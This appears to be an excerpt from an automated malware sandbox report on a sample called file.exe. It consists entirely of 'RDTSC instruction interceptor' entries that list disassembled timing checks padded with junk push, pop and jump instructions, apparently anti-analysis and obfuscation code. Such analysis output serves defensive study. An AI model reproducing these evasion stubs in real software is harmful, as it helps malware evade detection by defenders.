              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE2EB second address: 3EE2EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE2EF second address: 3EE2F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3EE2F5 second address: 3EE307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF3CD0A8ACh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1F73 second address: 3F1F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1F7A second address: 3F1F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F1F7F second address: 3F1FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CE524C6h 0x00000008 jmp 00007FBF3CE524C4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6347 second address: 3F6357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jp 00007FBF3CD0A8C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6357 second address: 3F635D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F635D second address: 3F6361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F65C1 second address: 3F65E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 jnp 00007FBF3CE524D7h 0x0000000c jmp 00007FBF3CE524C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FBF3CE524B6h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F68AE second address: 3F68B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F68B2 second address: 3F68C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524BCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6A46 second address: 3F6A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF3CD0A8B0h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6A5D second address: 3F6A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FBF3CE524B6h 0x00000009 jmp 00007FBF3CE524C8h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6A80 second address: 3F6A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5FE7 second address: 3F5FF7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF3CE524B6h 0x00000008 je 00007FBF3CE524B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F5FF7 second address: 3F6043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B3h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FBF3CD0A8B3h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d jmp 00007FBF3CD0A8ABh 0x00000022 jmp 00007FBF3CD0A8B6h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6043 second address: 3F6048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6D6A second address: 3F6D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBF3CD0A8A6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6D75 second address: 3F6D90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007FBF3CE524B6h 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b jns 00007FBF3CE524B6h 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6D90 second address: 3F6D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F6EF6 second address: 3F6EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F72EF second address: 3F72F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F72F3 second address: 3F72FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9516 second address: 3F9537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8AFh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jno 00007FBF3CD0A8A8h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3F9537 second address: 3F954F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FBF3CE524BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC11C second address: 3FC122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC122 second address: 3FC144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jbe 00007FBF3CE524B6h 0x0000000b jmp 00007FBF3CE524BCh 0x00000010 pop esi 0x00000011 pushad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC144 second address: 3FC14D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC2C0 second address: 3FC2C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3FC3F7 second address: 3FC3FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401AC8 second address: 401AEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBF3CE524C2h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007FBF3CE524B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401AEE second address: 401B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8AEh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401B01 second address: 401B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401DB4 second address: 401DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007FBF3CD0A8A6h 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401DC3 second address: 401DD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF3CE524BDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401F42 second address: 401F63 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBF3CD0A8B2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FBF3CD0A8A6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401F63 second address: 401F69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401F69 second address: 401F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FBF3CD0A8AAh 0x0000000e pop esi 0x0000000f jmp 00007FBF3CD0A8B2h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3B6972 second address: 3B6979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40229E second address: 4022A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4022A6 second address: 4022B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBF3CE524B6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4022B6 second address: 4022BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4068AB second address: 4068C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FBF3CE524CCh 0x0000000b jmp 00007FBF3CE524C0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4068C8 second address: 4068CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4068CC second address: 40690A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C6h 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FBF3CE524C4h 0x00000013 jl 00007FBF3CE524B8h 0x00000019 pushad 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40690A second address: 406919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF3CD0A8A6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 406C4D second address: 406C66 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF3CE524C2h 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40ABB4 second address: 40ABB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40ABB8 second address: 40ABC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CE524B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409F87 second address: 409F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 409F8D second address: 409F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40A105 second address: 40A109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40A38A second address: 40A390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40A4EB second address: 40A4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40A4EF second address: 40A4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412CB3 second address: 412CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410D85 second address: 410D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410D89 second address: 410D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410D8D second address: 410D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410F65 second address: 410F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8B5h 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 410F7F second address: 410F84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41135C second address: 411362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412193 second address: 4121A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524BCh 0x00000007 ja 00007FBF3CE524B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 412763 second address: 412768 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41B233 second address: 41B237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41A6F4 second address: 41A700 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF3CD0A8AEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41A700 second address: 41A715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBF3CE524C6h 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 41AE28 second address: 41AE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42467F second address: 424694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF3CE524B6h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 424694 second address: 42469B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42277E second address: 422794 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBF3CE524BBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 422E70 second address: 422E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CD0A8B0h 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pushad 0x0000000c jmp 00007FBF3CD0A8ABh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42312F second address: 423143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF3CE524BCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4233F0 second address: 4233FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4233FA second address: 423406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBF3CE524B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423D1B second address: 423D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 423D21 second address: 423D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 42DDE9 second address: 42DDFF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF3CD0A8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBF3CD0A8ACh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43B079 second address: 43B086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007FBF3CE524C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 43AD33 second address: 43AD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B3h 0x00000007 ja 00007FBF3CD0A8B9h 0x0000000d jmp 00007FBF3CD0A8ADh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 444DA8 second address: 444DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448881 second address: 448890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FBF3CD0A8A6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 448890 second address: 4488B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF3CE524C8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4488B6 second address: 4488D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FBF3CD0A8AFh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FBF3CD0A8A6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4488D7 second address: 4488DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44FDE4 second address: 44FDEE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF3CD0A8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44FC18 second address: 44FC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF3CE524C9h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44FC36 second address: 44FC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF3CD0A8B5h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4571E1 second address: 4571E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455C0E second address: 455C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CD0A8B5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 455C27 second address: 455C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FBF3CE524CEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45B9EC second address: 45BA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBF3CD0A8B9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45BA0D second address: 45BA17 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF3CE524B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 45BA17 second address: 45BA1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36BC93 second address: 36BCAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jnc 00007FBF3CE524B6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4673CD second address: 4673D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4673D1 second address: 4673E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF3CE524C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4673E9 second address: 4673F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
